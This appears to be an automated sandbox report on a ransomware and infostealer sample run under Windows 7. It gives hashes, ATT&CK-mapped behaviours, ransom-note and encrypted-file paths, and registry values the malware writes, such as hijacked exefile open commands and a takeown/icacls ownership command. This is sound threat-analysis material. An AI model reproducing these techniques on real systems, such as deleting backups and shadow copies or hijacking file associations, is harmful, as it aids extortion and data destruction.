b3c495a36fea5be7069701fc373d83739aa721b87aac18c3abc390d836500047

Analysis

max time kernel
151s
max time network
138s
platform
windows7_x64
resource
win7-20220414-en
submitted
29-05-2022 18:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample.exe
Size

1.8MB
MD5

f477c3bd9d9599a59affb41a8807f8ae
SHA1

1fee4f5bda8b765acbb741aeebfe74ea9b0f0f4e
SHA256

d2c47b1c94e6beadbc222771e788e9dafe194c462760b0d16cd25cbc0a572a00
SHA512

75060be4bbd7fee8ce455e533a6fb8d7b48e64daf90266e6d346f51545e2922c78497e6eb8937de2102e2fff98c9645eb78c7785dc145d9d3d838ac94f417257

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	encoderdecryption@yandex.ru.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\A8C4AD38.exe\" \"%L\""	encoderdecryption@yandex.ru.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

560 bcdedit.exe
1092 bcdedit.exe
520 bcdedit.exe
1308 bcdedit.exe
1940 bcdedit.exe
556 bcdedit.exe
Deletes backup catalog 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

540 wbadmin.exe
908 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Executes dropped EXE 2 IoCs

Processes:

encoderdecryption@yandex.ru.exeBackupXXXA8C4AD38.exe

pid process

1772 encoderdecryption@yandex.ru.exe
1676 BackupXXXA8C4AD38.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

pid	process
560	bcdedit.exe
1092	bcdedit.exe
520	bcdedit.exe
1308	bcdedit.exe
1940	bcdedit.exe
556	bcdedit.exe

pid	process
540	wbadmin.exe
908	wbadmin.exe

pid	process
1772	encoderdecryption@yandex.ru.exe
1676	BackupXXXA8C4AD38.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\BackupOpen.tiff	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Pictures\WatchRename.tiff	encoderdecryption@yandex.ru.exe

Deletes itself 1 IoCs

Processes:

encoderdecryption@yandex.ru.exe

pid process

1772 encoderdecryption@yandex.ru.exe

pid	process
1772	encoderdecryption@yandex.ru.exe

Drops startup file 4 IoCs

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\encoderdecryption@yandex.ru.url	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	encoderdecryption@yandex.ru.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[encoderdecryption@yandex.ru][A8C4AD38]desktop.ini.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 64 IoCs

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IHVY6LD2\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1083475884-596052423-1669053738-1000\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\A9INZ3MO\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M1JJU24G\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VP7YQ4XO\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VCRELHVT\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T2CDOEA4\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\N6KW9TJE\desktop.ini	encoderdecryption@yandex.ru.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 icanhazip.com

flow	ioc
3	icanhazip.com

Drops file in System32 directory 2 IoCs

Processes:

ReAgentc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\Desktop\Wallpaper	encoderdecryption@yandex.ru.exe

Drops file in Program Files directory 64 IoCs

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\[encoderdecryption@yandex.ru][A8C4AD38]org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\[encoderdecryption@yandex.ru][A8C4AD38]org-netbeans-api-search.jar.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\[encoderdecryption@yandex.ru][A8C4AD38]boot.jar.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_SelectionSubpicture.png	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_matte.wmv	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\LICENSE	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\[encoderdecryption@yandex.ru][A8C4AD38]jabswitch.exe.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\[encoderdecryption@yandex.ru][A8C4AD38]Karachi.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\[encoderdecryption@yandex.ru][A8C4AD38]Berlin.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\[encoderdecryption@yandex.ru][A8C4AD38]GrantUnblock.au3.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\TipBand.dll	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\rtscom.dll.mui	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\DVD Maker\WMM2CLIP.dll	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\[encoderdecryption@yandex.ru][A8C4AD38]OSPPSVC.EXE.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG.wmv	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\[encoderdecryption@yandex.ru][A8C4AD38]Maceio.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\ja-JP\msaddsr.dll.mui	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\[encoderdecryption@yandex.ru][A8C4AD38]license.html.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fa.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\[encoderdecryption@yandex.ru][A8C4AD38]org.eclipse.swt_3.103.1.v20140903-1938.jar.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Common Files\System\msadc\fr-FR\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\DVD Maker\fr-FR\OmdProject.dll.mui	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\[encoderdecryption@yandex.ru][A8C4AD38]com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\rtscom.dll.mui	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\[encoderdecryption@yandex.ru][A8C4AD38]asl-v20.txt.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\[encoderdecryption@yandex.ru][A8C4AD38]Rainy_River.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\[encoderdecryption@yandex.ru][A8C4AD38]et.pak.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#FILES-ENCRYPTED.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\[encoderdecryption@yandex.ru][A8C4AD38]Pohnpei.EAF	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\[encoderdecryption@yandex.ru][A8C4AD38]org-netbeans-modules-spi-actions.jar.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui	encoderdecryption@yandex.ru.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\[encoderdecryption@yandex.ru][A8C4AD38]prism-d3d.dll.EAF	encoderdecryption@yandex.ru.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan	encoderdecryption@yandex.ru.exe

Drops file in Windows directory 5 IoCs

Processes:

encoderdecryption@yandex.ru.exe

description	ioc	process
File created	C:\Windows\A8C4AD38.bat	encoderdecryption@yandex.ru.exe
File created	C:\Windows\A8C4AD38.ico	encoderdecryption@yandex.ru.exe
File created	C:\Windows\A8C4AD38.exe	encoderdecryption@yandex.ru.exe
File created	C:\Windows\BackupXXXA8C4AD38.exe	encoderdecryption@yandex.ru.exe
File created	C:\Windows\This Is Your Helper File.txt	encoderdecryption@yandex.ru.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

1820 vssadmin.exe
1520 vssadmin.exe

pid	process
1820	vssadmin.exe
1520	vssadmin.exe

Modifies registry class 25 IoCs

Processes:

encoderdecryption@yandex.ru.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open\command\ = "\"C:\\Windows\\A8C4AD38.exe\" \"%L\""	encoderdecryption@yandex.ru.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\DefaultIcon	encoderdecryption@yandex.ru.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\ = "Take Ownership"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell	encoderdecryption@yandex.ru.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open	encoderdecryption@yandex.ru.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Take Ownership"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF	encoderdecryption@yandex.ru.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\DefaultIcon\ = "C:\\Windows\\A8C4AD38.ico"	encoderdecryption@yandex.ru.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\A8C4AD38.exe\" \"%L\""	encoderdecryption@yandex.ru.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\ = "EAF File"	encoderdecryption@yandex.ru.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open\command	encoderdecryption@yandex.ru.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

892 PING.EXE
328 PING.EXE
2032 PING.EXE

pid	process
892	PING.EXE
328	PING.EXE
2032	PING.EXE

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

sample.exeencoderdecryption@yandex.ru.exe

pid	process
556	sample.exe
556	sample.exe
1772	encoderdecryption@yandex.ru.exe
1772	encoderdecryption@yandex.ru.exe
1772	encoderdecryption@yandex.ru.exe
1772	encoderdecryption@yandex.ru.exe
1772	encoderdecryption@yandex.ru.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

sample.exeencoderdecryption@yandex.ru.exewbengine.exevssvc.exeWMIC.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	556	sample.exe
Token: SeDebugPrivilege	1772	encoderdecryption@yandex.ru.exe
Token: SeBackupPrivilege	632	wbengine.exe
Token: SeRestorePrivilege	632	wbengine.exe
Token: SeSecurityPrivilege	632	wbengine.exe
Token: SeBackupPrivilege	1176	vssvc.exe
Token: SeRestorePrivilege	1176	vssvc.exe
Token: SeAuditPrivilege	1176	vssvc.exe
Token: SeIncreaseQuotaPrivilege	828	WMIC.exe
Token: SeSecurityPrivilege	828	WMIC.exe
Token: SeTakeOwnershipPrivilege	828	WMIC.exe
Token: SeLoadDriverPrivilege	828	WMIC.exe
Token: SeSystemProfilePrivilege	828	WMIC.exe
Token: SeSystemtimePrivilege	828	WMIC.exe
Token: SeProfSingleProcessPrivilege	828	WMIC.exe
Token: SeIncBasePriorityPrivilege	828	WMIC.exe
